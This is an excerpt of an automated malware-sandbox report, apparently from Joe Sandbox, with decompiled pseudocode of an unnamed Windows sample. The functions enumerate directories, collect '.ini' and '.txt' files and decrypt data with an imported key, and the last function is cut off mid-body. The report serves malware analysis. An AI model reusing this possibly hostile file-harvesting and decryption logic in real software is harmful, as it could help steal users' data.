Instruction Fuzzy Hash: CB129CB190520A9BDB50EF25EC66B7A37E7BB84308F04142DFA45872A1EB71D904CF66

Uniqueness

Uniqueness Score: -1.00%

Function 006ED4B0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 135
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E006ED4B0() {
				long _t50;
				signed int _t54;
				signed int _t55;
				void* _t57;
				int _t59;
				void* _t61;
				void _t64;
				long _t70;
				void _t72;
				signed int _t73;
				void** _t75;
				signed int _t76;
				void* _t77;
				WCHAR* _t79;
				void* _t81;
				void* _t82;
				signed int _t83;
				WCHAR* _t84;
				signed int _t85;
				void** _t87;
				void** _t89;

				_t77 = _t87[0x151];
				_t84 =  &(_t87[0x34]);
				_t50 = GetFullPathNameW(_t87[0x153], 0x105, _t84, 0);
				_t81 = 0;
				if(_t50 == 0) {
					L23:
					E006E91E0(_t81);
					_t72 = 0;
					_t82 = 0;
				} else {
					PathAddBackslashW(_t84);
					_t73 = 0xfffffefb;
					while( *((short*)(_t87 + 0x2dc + _t73 * 2)) != 0) {
						_t73 = _t73 + 1;
						if(_t73 != 0) {
							continue;
						} else {
							L22:
							_t81 = 0;
							goto L23;
						}
						goto L24;
					}
					_t54 = 0xfffffefb;
					_t87[2] = 0x2e002a;
					_t87[3] = 0x2a;
					while( *((short*)(_t87 + 0x2dc + _t54 * 2)) != 0) {
						_t54 = _t54 + 1;
						if(_t54 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L24;
					}
					_t75 =  &(_t87[2]);
					_t55 = _t54 + 1;
					_t83 = 0x2a;
					while(1) {
						_t76 = _t55;
						 *(_t87 + 0x2da + _t55 * 2) = _t83;
						if(_t55 == 0) {
							break;
						}
						_t83 =  *_t75 & 0x0000ffff;
						_t75 =  &(_t75[0]);
						_t16 = _t76 + 1; // 0xfffffefd
						_t55 = _t16;
						if(_t83 != 0) {
							continue;
						} else {
							 *((short*)(_t87 + 0x2dc + _t76 * 2)) = 0;
							_t57 = FindFirstFileW(_t84,  &(_t87[0xb7])); // executed
							_t81 = 0;
							 *_t87 = _t57;
							if(_t57 == 0xffffffff) {
								goto L23;
							} else {
								 *((short*)(_t87 + 0x2dc + _t73 * 2)) = 0;
								_t82 = 0;
								_t87[1] = 0;
								do {
									if((_t87[0xb7].dwFileAttributes & 0x00000010) != 0) {
										goto L18;
									} else {
										_t79 = _t84;
										_t85 = 1;
										_t61 = E006E3180(4, _t87[1]);
										_t87 =  &(_t87[2]);
										_t81 = _t61;
										if(_t61 == 0) {
											L25:
											FindClose( *_t87);
											_t77 = _t87[0x151];
											L26:
											if(_t85 != 0) {
												do {
													E006E91E0( *((intOrPtr*)(_t81 + _t85 * 4 - 4)));
													_t87 =  &(_t87[1]);
													_t85 = _t85 - 1;
												} while (_t85 != 0);
											}
											goto L23;
											L29:
										} else {
											_t64 = E006E3180(0x208, 0);
											_t87 =  &(_t87[2]);
											 *_t81 = _t64;
											if(_t64 == 0) {
												goto L25;
											} else {
												E006F4520( &(_t87[3]), 0x23);
												_t89 =  &(_t87[2]);
												_push( &(_t89[0xc2]));
												E006F68E0( *_t81, 0x105,  &(_t89[4]), _t79);
												_t87 =  &(_t89[5]);
												_t72 = _t85;
												_t84 = _t79;
												_t87[1] = _t81;
												goto L18;
											}
										}
									}
									goto L24;
									L18:
									_t59 = FindNextFileW(_t87[1],  &(_t87[0xb7])); // executed
								} while (_t59 != 0);
								_t70 = GetLastError();
								FindClose( *_t87);
								_t77 = _t87[0x151];
								_t85 = _t72;
								if(_t70 != 0x12) {
									goto L26;
								}
							}
						}
						goto L24;
					}
					 *((short*)(_t87 + 0x2da + _t76 * 2)) = 0;
					goto L22;
				}
				L24:
				 *_t77 = _t72;
				return _t82;
				goto L29;
			}

0x006ed4ba
0x006ed4c1
0x006ed4d7
0x006ed4df
0x006ed4e4
0x006ed665
0x006ed666
0x006ed66e
0x006ed670
0x006ed4ea
0x006ed4eb
0x006ed4f1
0x006ed4f6
0x006ed501
0x006ed502
0x00000000
0x006ed504
0x006ed663
0x006ed663
0x00000000
0x006ed663
0x00000000
0x006ed502
0x006ed509
0x006ed50e
0x006ed516
0x006ed51e
0x006ed529
0x006ed52a
0x00000000
0x006ed52c
0x00000000
0x006ed52c
0x00000000
0x006ed52a
0x006ed531
0x006ed535
0x006ed536
0x006ed53a
0x006ed53a
0x006ed53e
0x006ed546
0x00000000
0x00000000
0x006ed54c
0x006ed54f
0x006ed552
0x006ed552
0x006ed558
0x00000000
0x006ed55a
0x006ed561
0x006ed56d
0x006ed576
0x006ed57b
0x006ed57e
0x00000000
0x006ed584
0x006ed58a
0x006ed596
0x006ed598
0x006ed5a0
0x006ed5a8
0x00000000
0x006ed5aa
0x006ed5aa
0x006ed5ac
0x006ed5bb
0x006ed5c0
0x006ed5c3
0x006ed5c7
0x006ed681
0x006ed684
0x006ed68a
0x006ed691
0x006ed693
0x006ed695
0x006ed699
0x006ed69e
0x006ed6a1
0x006ed6a1
0x006ed6a4
0x00000000
0x00000000
0x006ed5cd
0x006ed5d4
0x006ed5d9
0x006ed5de
0x006ed5e1
0x00000000
0x006ed5e7
0x006ed5ee
0x006ed5f3
0x006ed5fd
0x006ed60c
0x006ed611
0x006ed614
0x006ed616
0x006ed61e
0x00000000
0x006ed61e
0x006ed5e1
0x006ed5c7
0x00000000
0x006ed622
0x006ed62e
0x006ed630
0x006ed638
0x006ed643
0x006ed649
0x006ed653
0x006ed655
0x00000000
0x006ed657
0x006ed655
0x006ed57e
0x00000000
0x006ed558
0x006ed659
0x00000000
0x006ed659
0x006ed672
0x006ed672
0x006ed680
0x00000000

APIs

GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006ED4D7
PathAddBackslashW.SHLWAPI(?), ref: 006ED4EB
FindFirstFileW.KERNELBASE(?,00000000), ref: 006ED56D
FindNextFileW.KERNELBASE(00000000,00000010), ref: 006ED62E
GetLastError.KERNEL32 ref: 006ED638
FindClose.KERNEL32 ref: 006ED643
FindClose.KERNEL32 ref: 006ED684

Strings

*, xrefs: 006ED516
*, xrefs: 006ED50E

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Find$CloseFilePath$BackslashErrorFirstFullLastNameNext
String ID: *$*
API String ID: 1945327101-3771216468
Opcode ID: d2d662a0cda4d63c8aef6d81547dedb5bc9dffaaba5cce223c129321c0385b70
Instruction ID: 340f29f46b9f3238117469f7355e5fe3584761f87fefaf29f968a674cda0c236
Opcode Fuzzy Hash: d2d662a0cda4d63c8aef6d81547dedb5bc9dffaaba5cce223c129321c0385b70
Instruction Fuzzy Hash: BF41F3725053859BD330AF65EC48BEBB7EAEF84308F24442DE889972A1E7719D14CF52

Uniqueness

Uniqueness Score: -1.00%

Function 006F5AB0, Relevance: 10.6, APIs: 7, Instructions: 115
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E006F5AB0(intOrPtr* _a4) {
				BYTE* _v0;
				intOrPtr _v8;
				intOrPtr _v40;
				int _v64;
				char _v68;
				long* _v72;
				char _v80;
				long* _v88;
				intOrPtr _v92;
				char _v104;
				intOrPtr _v116;
				intOrPtr _v132;
				char _v144;
				long* _v148;
				intOrPtr* _t22;
				void* _t23;
				long* _t24;
				long* _t25;
				int* _t34;
				BYTE* _t37;
				DWORD* _t39;
				intOrPtr* _t42;
				char* _t43;
				long* _t46;
				int _t47;
				BYTE* _t49;
				HCRYPTKEY* _t51;

				_t49 = 0;
				_t22 =  &_v68;
				 *_t22 = 0;
				 *_t51 = 0;
				_v72 = 0;
				_t23 =  *0x6f9e08(_t22, 0, 0, 0x18, 0xf0000000); // executed
				if(_t23 == 0) {
					_t46 = 0;
				} else {
					_t43 =  &_v68;
					 *((intOrPtr*)(_t43 - 0xc)) = 0x208;
					 *((intOrPtr*)(_t43 - 8)) = 0x6610;
					 *((intOrPtr*)(_t43 - 4)) = 0x20;
					E006EC400(_t43, _v8, 0x20);
					_t51 =  &(_t51[3]);
					if(CryptImportKey(_v88,  &_v80, 0x2c, 0, 1, _t51) == 0) {
						L7:
						_t46 = 0;
						goto L8;
					} else {
						_t34 =  &_v104;
						 *_t34 = 1;
						_push(0);
						_push(_t34);
						_push(4);
						_push(_v116);
						if( *0x6f9e10() == 0) {
							goto L7;
						} else {
							_push(0);
							_push(_v40);
							_push(1);
							_push(_v132);
							if( *0x6f9e10() == 0) {
								goto L7;
							} else {
								_t47 = _v64;
								_t37 = E006E3180(_t47, 0);
								_t51 =  &(_t51[2]);
								if(_t37 == 0) {
									goto L7;
								} else {
									_t49 = _t37;
									E006EC400(_t37, _v68, _t47);
									_t51 =  &(_t51[3]);
									_t39 =  &_v144;
									 *_t39 = _t47;
									_t46 = 0;
									if(CryptDecrypt(_v148, 0, 1, 0, _t49, _t39) == 0) {
										E006E91E0(_t49);
										_t51 =  &(_t51[1]);
										L8:
										_t49 = 0;
									} else {
										_t46 = 1;
									}
								}
							}
						}
					}
				}
				_t24 =  *_t51;
				if(_t24 != 0) {
					CryptDestroyKey(_t24);
				}
				_t25 = _v88;
				_t42 = _a4;
				if(_t25 != 0) {
					CryptReleaseContext(_t25, 0);
				}
				_v0 = _t49;
				 *_t42 = _v92;
				return _t46;
			}

0x006f5ab7
0x006f5ab9
0x006f5abd
0x006f5abf
0x006f5ac2
0x006f5ad0
0x006f5ad8
0x006f5ba0
0x006f5ade
0x006f5ae2
0x006f5aeb
0x006f5af2
0x006f5af9
0x006f5aff
0x006f5b04
0x006f5b21
0x006f5b9a
0x006f5b9a
0x00000000
0x006f5b23
0x006f5b23
0x006f5b27
0x006f5b2d
0x006f5b2f
0x006f5b30
0x006f5b32
0x006f5b3e
0x00000000
0x006f5b40
0x006f5b40
0x006f5b42
0x006f5b46
0x006f5b48
0x006f5b54
0x00000000
0x006f5b56
0x006f5b56
0x006f5b5d
0x006f5b62
0x006f5b67
0x00000000
0x006f5b69
0x006f5b69
0x006f5b71
0x006f5b76
0x006f5b79
0x006f5b7d
0x006f5b7f
0x006f5b93
0x006f5bdf
0x006f5be4
0x006f5b9c
0x006f5b9c
0x006f5b95
0x006f5b97
0x006f5b97
0x006f5b93
0x006f5b67
0x006f5b54
0x006f5b3e
0x006f5b21
0x006f5ba2
0x006f5ba7
0x006f5baa
0x006f5baa
0x006f5bb0
0x006f5bb4
0x006f5bbe
0x006f5bc3
0x006f5bc3
0x006f5bc9
0x006f5bd0
0x006f5bdb

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,006F48B5,?,?,00000020,?,?,?,?,00000020), ref: 006F5AD0
CryptImportKey.ADVAPI32(?,?,0000002C,00000000,00000001), ref: 006F5B19
CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 006F5B36
CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 006F5B4C

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 006F5B8B
CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000,00000002), ref: 006F5BAA
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000), ref: 006F5BC3

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Crypt$ContextHeapParam$AcquireAllocateDecryptDestroyImportProcessRelease
String ID:
API String ID: 2876648536-0
Opcode ID: 5a6077dad3714ab69b0375cfb2208d7ba68576952f800f9e06c4afb71034a708
Instruction ID: 24b62bbbcebc9d4350f68c30a3ff29f34a67b4b66052bbdc5b4d8fcbfb875e8d
Opcode Fuzzy Hash: 5a6077dad3714ab69b0375cfb2208d7ba68576952f800f9e06c4afb71034a708
Instruction Fuzzy Hash: A1315C71204304ABE7209F22DC49F7BBBAAEF85B10F14441CBA4596290D7B1DC05DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006EF800, Relevance: 10.6, APIs: 7, Instructions: 96
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000020,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 006EF824
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 006EF841
CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 006EF859
CryptGetHashParam.ADVAPI32(00000004,00000004,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 006EF87B

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

CryptGetHashParam.ADVAPI32(00000002,00000002,00000000,?,00000000,?,?,?,?,?,0000800C), ref: 006EF8A3
CryptDestroyHash.ADVAPI32(00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?,00000002), ref: 006EF8CB
CryptReleaseContext.ADVAPI32(?,00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?), ref: 006EF8E4

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Crypt$Hash$ContextHeapParam$AcquireAllocateCreateDataDestroyProcessRelease
String ID:
API String ID: 3570522263-0
Opcode ID: 8e75188814708d47d836c8b09bba4f5841bf54efd30f8e84128d3e9e686a1209
Instruction ID: ef6af617f85f5d4d7a5f652b4d984f3ca2167124cb42a2bf24775b3e161fb78f
Opcode Fuzzy Hash: 8e75188814708d47d836c8b09bba4f5841bf54efd30f8e84128d3e9e686a1209
Instruction Fuzzy Hash: 97317C71205350AFE7219F26DC09F6B7BAAFF84B50F004829F948D62A0D770DD01DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006F5710, Relevance: 7.8, APIs: 5, Instructions: 256
filesleepstringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E006F5710() {
				void* _t96;
				void** _t97;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed char _t104;
				int _t106;
				void** _t112;
				signed short _t113;
				void* _t115;
				void* _t122;
				void* _t125;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				void* _t132;
				signed int _t133;
				void** _t134;
				intOrPtr* _t136;
				signed short* _t137;
				signed short* _t139;
				signed short* _t140;
				void** _t144;
				void* _t145;
				void* _t146;
				signed int _t147;
				void* _t148;
				void* _t151;
				void* _t153;
				void** _t154;
				void* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t165;
				signed int _t168;
				signed int _t169;
				WCHAR* _t170;
				void* _t171;
				void** _t172;
				void** _t173;

				_t155 = _t172[0x29e];
				_t96 = _t172[0x29d];
				_t146 = _t172[0x29c];
				_t131 = 0xfffffc00;
				while(1) {
					_t157 =  *(_t146 + _t131 + 0x400) & 0x0000ffff;
					if(_t157 == 0) {
						break;
					}
					 *(_t172 + _t131 + 0x65c) = _t157;
					_t131 = _t131 + 2;
					if(_t131 != 0) {
						continue;
					}
					 *((short*)(_t172 + _t131 + 0x65a)) = 0;
					L42:
					return 0;
				}
				 *(_t172 + _t131 + 0x65c) = 0;
				if(_t96 == 0) {
					L22:
					_t132 = 0x200;
					_t97 =  &(_t172[0x97]);
					while( *_t97 != 0) {
						_t97 =  &(_t97[0]);
						_t132 = _t132 - 1;
						if(_t132 != 0) {
							continue;
						}
						goto L42;
					}
					_t158 = 0;
					while(1) {
						_t147 = _t158;
						_t34 = _t158 + 0x6f9c1c; // 0x5c
						_t159 =  *(_t158 + _t34) & 0x0000ffff;
						if(_t159 == 0) {
							break;
						}
						 *(_t97 + _t147 * 2) = _t159;
						_t37 = _t147 + 1; // 0x1
						_t158 = _t37;
						if(_t132 != _t158) {
							continue;
						}
						 *(_t97 + _t147 * 2) = 0;
						goto L42;
					}
					 *(_t97 + _t147 * 2) = 0;
					_t98 = 0xfffffc00;
					while(1) {
						_t133 =  *(_t172 + _t98 + 0x65c) & 0x0000ffff;
						if(_t133 == 0) {
							break;
						}
						 *(_t172 + _t98 + 0xa5c) = _t133;
						_t98 = _t98 + 2;
						if(_t98 != 0) {
							continue;
						}
						 *((short*)(_t172 + _t98 + 0xa5a)) = 0;
						goto L42;
					}
					_t134 =  &(_t172[0x97]);
					_t148 = 0x200;
					 *(_t172 + _t98 + 0xa5c) = 0;
					while( *_t134 != 0) {
						_t134 =  &(_t134[0]);
						_t148 = _t148 - 1;
						if(_t148 != 0) {
							continue;
						}
						return 0;
					}
					_t160 = 0;
					while(1) {
						_t99 = _t160;
						_t52 = _t160 + 0x6f9ba4; // 0x2a005c
						_t161 =  *(_t160 + _t52) & 0x0000ffff;
						if(_t161 == 0) {
							break;
						}
						 *(_t134 + _t99 * 2) = _t161;
						_t55 = _t99 + 1; // 0x1
						_t160 = _t55;
						if(_t148 != _t160) {
							continue;
						}
						 *(_t134 + _t99 * 2) = 0;
						goto L42;
					}
					 *(_t134 + _t99 * 2) = 0;
					_t101 = FindFirstFileW( &(_t172[0x97]),  &(_t172[3])); // executed
					 *_t172 = _t101;
					if(_t101 == 0xffffffff) {
						L75:
						return 1;
					}
					_t136 =  *0x6f9d94;
					_t170 =  &(_t172[0xe]);
					do {
						_t104 = _t172[3].dwFileAttributes;
						_t125 = 0;
						if((_t104 & 0x00000002) != 0) {
							goto L72;
						}
						if((_t104 & 0x00000010) != 0) {
							_push(0x6f9aa4);
							_push(_t170);
							if( *_t136() != 0 && lstrcmpiW(_t170, 0x6f9c3a) != 0) {
								_push(_t155);
								_push(_t170);
								_push( &(_t172[0x199]));
								E006F5710();
								_t172 =  &(_t172[3]);
							}
							L71:
							goto L72;
						}
						_t171 = 0;
						_t112 =  &(_t172[0xd]);
						while( *(_t172 + _t171 + 0x38) != 0) {
							_t171 = _t171 + 2;
							_t112 =  &(_t112[0]);
							if(_t171 != 0x400) {
								continue;
							}
							L55:
							_t125 = 0;
							goto L72;
						}
						_t137 = _t172 + _t171 + 0x36;
						_t125 = 0;
						if(_t137 <=  &(_t172[0xe])) {
							goto L72;
						}
						_t125 = 0;
						if(( *_t137 & 0x0000ffff) != 0x2e) {
							_t151 = 1;
							while(1) {
								_t165 = _t151;
								_t139 = _t112;
								if(_t139 <=  &(_t172[0xe])) {
									break;
								}
								_t89 = _t165 + 1; // 0x2
								_t151 = _t89;
								_t112 = _t139 - 2;
								if(( *_t139 & 0x0000ffff) != 0x2e) {
									continue;
								}
								break;
							}
							_t155 = _t172[0x29e];
							_t140 =  &(_t139[1]);
							L66:
							if(_t165 != 3) {
								goto L71;
							}
							_t113 =  *_t140;
							if(_t113 == 0x6e0069) {
								if(_t140[2] != 0x69) {
									goto L72;
								}
								L47:
								_t64 = _t171 + 2; // 0x2
								_t172[3].dwFileAttributes = _t64;
								_t115 = E006E3180(_t64, 0);
								_t172 =  &(_t172[2]);
								_t125 = 0;
								_t172[1] = _t115;
								if(_t115 == 0) {
									goto L72;
								}
								E006EC400(_t115,  &(_t172[0xf]), _t172[2]);
								_t173 =  &(_t172[3]);
								 *((short*)(_t173[1] + _t171)) = 0;
								E006E1200( *_t155,  &(_t173[1]));
								E006F7410( &(_t173[0x199]),  &(_t172[0xf]), _t155);
								_t172 =  &(_t173[3]);
								_t122 = E006EC430( *((intOrPtr*)(_t155 + 8)));
								_t125 = 1;
								if(_t122 > 0x10000) {
									goto L72;
								}
								Sleep(0x64);
								goto L55;
							}
							if(_t113 != 0x780074) {
								goto L72;
							}
							if(_t140[2] == 0x74) {
								goto L47;
							}
							goto L72;
						}
						_t140 = _t172 + _t171 + 0x38;
						_t165 = 0;
						goto L66;
						L72:
						_t106 = FindNextFileW(_t172[1],  &(_t172[3])); // executed
						_t136 =  *0x6f9d94;
						_t170 =  &(_t172[0xe]);
					} while (_t125 == 0 && _t106 != 0);
					FindClose( *_t172);
					goto L75;
				}
				_t153 = 0x200;
				_t144 =  &(_t172[0x97]);
				while( *_t144 != 0) {
					_t144 =  &(_t144[0]);
					_t153 = _t153 - 1;
					if(_t153 != 0) {
						continue;
					}
					goto L42;
				}
				_t127 = 0;
				while(1) {
					_t168 = _t127;
					_t14 = _t127 + 0x6f9c1c; // 0x5c
					_t128 =  *(_t127 + _t14) & 0x0000ffff;
					if(_t128 == 0) {
						break;
					}
					 *(_t144 + _t168 * 2) = _t128;
					_t17 = _t168 + 1; // 0x1
					_t127 = _t17;
					if(_t153 != _t127) {
						continue;
					}
					 *(_t144 + _t168 * 2) = 0;
					goto L42;
				}
				 *(_t144 + _t168 * 2) = 0;
				_t154 =  &(_t172[0x97]);
				_t145 = 0x200;
				while( *_t154 != 0) {
					_t154 =  &(_t154[0]);
					_t145 = _t145 - 1;
					if(_t145 != 0) {
						continue;
					}
					goto L42;
				}
				_t129 = 0;
				while(1) {
					_t169 = _t129;
					_t130 =  *(_t96 + _t129 * 2) & 0x0000ffff;
					if(_t130 == 0) {
						break;
					}
					 *(_t154 + _t169 * 2) = _t130;
					_t27 = _t169 + 1; // 0x1
					_t129 = _t27;
					if(_t145 != _t129) {
						continue;
					}
					 *(_t154 + _t169 * 2) = 0;
					goto L42;
				}
				 *(_t154 + _t169 * 2) = 0;
				goto L22;
			}

0x006f571a
0x006f5721
0x006f5728
0x006f572f
0x006f5734
0x006f5734
0x006f573f
0x00000000
0x00000000
0x006f5741
0x006f5749
0x006f574c
0x00000000
0x00000000
0x006f574e
0x006f58b9
0x00000000
0x006f58b9
0x006f575f
0x006f5769
0x006f57ff
0x006f57ff
0x006f5804
0x006f580b
0x006f5811
0x006f5814
0x006f5815
0x00000000
0x00000000
0x00000000
0x006f5817
0x006f581c
0x006f581e
0x006f581e
0x006f5820
0x006f5820
0x006f582b
0x00000000
0x00000000
0x006f582d
0x006f5831
0x006f5831
0x006f5836
0x00000000
0x00000000
0x006f5838
0x00000000
0x006f5838
0x006f5840
0x006f5846
0x006f584b
0x006f584b
0x006f5856
0x00000000
0x00000000
0x006f5858
0x006f5860
0x006f5863
0x00000000
0x00000000
0x006f5865
0x00000000
0x006f5865
0x006f5871
0x006f5878
0x006f587d
0x006f5887
0x006f588d
0x006f5892
0x006f5893
0x00000000
0x00000000
0x00000000
0x006f5893
0x006f5897
0x006f5899
0x006f5899
0x006f589b
0x006f589b
0x006f58a6
0x00000000
0x00000000
0x006f58a8
0x006f58ac
0x006f58ac
0x006f58b1
0x00000000
0x00000000
0x006f58b3
0x00000000
0x006f58b3
0x006f58c6
0x006f58d9
0x006f58e2
0x006f58e5
0x006f5a9b
0x00000000
0x006f5a9d
0x006f58eb
0x006f58f7
0x006f598e
0x006f598e
0x006f5992
0x006f5996
0x00000000
0x00000000
0x006f599e
0x006f59c3
0x006f59c8
0x006f59cf
0x006f59e5
0x006f59e6
0x006f59ee
0x006f59ef
0x006f59f4
0x006f59f4
0x006f5a6b
0x00000000
0x006f5a6b
0x006f59a0
0x006f59a2
0x006f59a6
0x006f59ae
0x006f59b1
0x006f59ba
0x00000000
0x00000000
0x006f59bc
0x006f59bc
0x00000000
0x006f59bc
0x006f59f9
0x006f5a01
0x006f5a05
0x00000000
0x00000000
0x006f5a0a
0x006f5a0f
0x006f5a1b
0x006f5a1c
0x006f5a1c
0x006f5a1e
0x006f5a26
0x00000000
0x00000000
0x006f5a2b
0x006f5a2b
0x006f5a2e
0x006f5a34
0x00000000
0x00000000
0x00000000
0x006f5a34
0x006f5a36
0x006f5a3d
0x006f5a40
0x006f5a43
0x00000000
0x00000000
0x006f5a45
0x006f5a4c
0x006f590a
0x00000000
0x00000000
0x006f5910
0x006f5910
0x006f5915
0x006f591a
0x006f591f
0x006f5922
0x006f5926
0x006f592a
0x00000000
0x00000000
0x006f593c
0x006f5941
0x006f5948
0x006f5955
0x006f5964
0x006f5969
0x006f596f
0x006f5979
0x006f597e
0x00000000
0x00000000
0x006f5986
0x00000000
0x006f5986
0x006f5a5d
0x00000000
0x00000000
0x006f5a63
0x00000000
0x00000000
0x00000000
0x006f5a69
0x006f5a11
0x006f5a15
0x00000000
0x006f5a71
0x006f5a7a
0x006f5a7c
0x006f5a84
0x006f5a84
0x006f5a95
0x00000000
0x006f5a95
0x006f576f
0x006f5774
0x006f577b
0x006f5781
0x006f5784
0x006f5785
0x00000000
0x00000000
0x00000000
0x006f5787
0x006f578c
0x006f578e
0x006f578e
0x006f5790
0x006f5790
0x006f579b
0x00000000
0x00000000
0x006f579d
0x006f57a1
0x006f57a1
0x006f57a6
0x00000000
0x00000000
0x006f57a8
0x00000000
0x006f57a8
0x006f57b3
0x006f57b9
0x006f57c0
0x006f57c5
0x006f57cb
0x006f57ce
0x006f57cf
0x00000000
0x00000000
0x00000000
0x006f57d1
0x006f57d6
0x006f57d8
0x006f57d8
0x006f57da
0x006f57e1
0x00000000
0x00000000
0x006f57e3
0x006f57e7
0x006f57e7
0x006f57ec
0x00000000
0x00000000
0x006f57ee
0x00000000
0x006f57ee
0x006f57f9
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 006F58D9
Sleep.KERNEL32(00000064,?,?,?), ref: 006F5986
lstrcmpiW.KERNEL32(?,006F9C3A), ref: 006F59DB
FindNextFileW.KERNELBASE(?,?), ref: 006F5A7A
FindClose.KERNEL32 ref: 006F5A95

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleeplstrcmpi
String ID:
API String ID: 2811834920-0
Opcode ID: 058f17470b0d8f60bb598675081ce0032cef52631d9bc6ee5293648055a8dd6d
Instruction ID: 81679e3e3df590c0fc9b3bb425b44d8ff1b12ae33036824789d9f9ae697bff9b
Opcode Fuzzy Hash: 058f17470b0d8f60bb598675081ce0032cef52631d9bc6ee5293648055a8dd6d
Instruction Fuzzy Hash: 0C91FF21904B18DBD734AB24D8846BAB3E7FF80314F64892DE7578B3A1E7719C46C792

Uniqueness

Uniqueness Score: -1.00%

Function 006EA4D0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 413
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E006EA4D0(signed int __edx) {
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t121;
				signed int _t123;
				signed int _t132;
				signed int _t136;
				intOrPtr _t144;
				intOrPtr _t146;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				signed short* _t152;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t159;
				void* _t163;
				void* _t166;
				signed int _t172;
				signed int _t178;
				signed short* _t184;
				intOrPtr _t185;
				signed int _t187;
				char _t190;
				signed int _t196;
				char _t201;
				intOrPtr _t202;
				void* _t203;
				signed int* _t204;
				intOrPtr _t205;
				signed int* _t206;
				intOrPtr _t212;
				signed int _t218;
				void* _t220;
				void* _t222;
				intOrPtr _t223;
				void* _t228;
				void* _t247;
				WCHAR* _t254;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t262;
				struct _SECURITY_ATTRIBUTES* _t266;
				void* _t273;
				intOrPtr _t276;
				intOrPtr* _t278;
				intOrPtr _t280;
				intOrPtr _t281;
				intOrPtr _t282;
				void* _t284;
				void* _t285;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t294;
				intOrPtr* _t295;
				void* _t296;
				intOrPtr* _t298;
				void* _t299;
				intOrPtr* _t300;
				intOrPtr* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				intOrPtr* _t307;
				void* _t318;

				_t234 = __edx;
				_t278 =  *((intOrPtr*)(_t288 + 0x548));
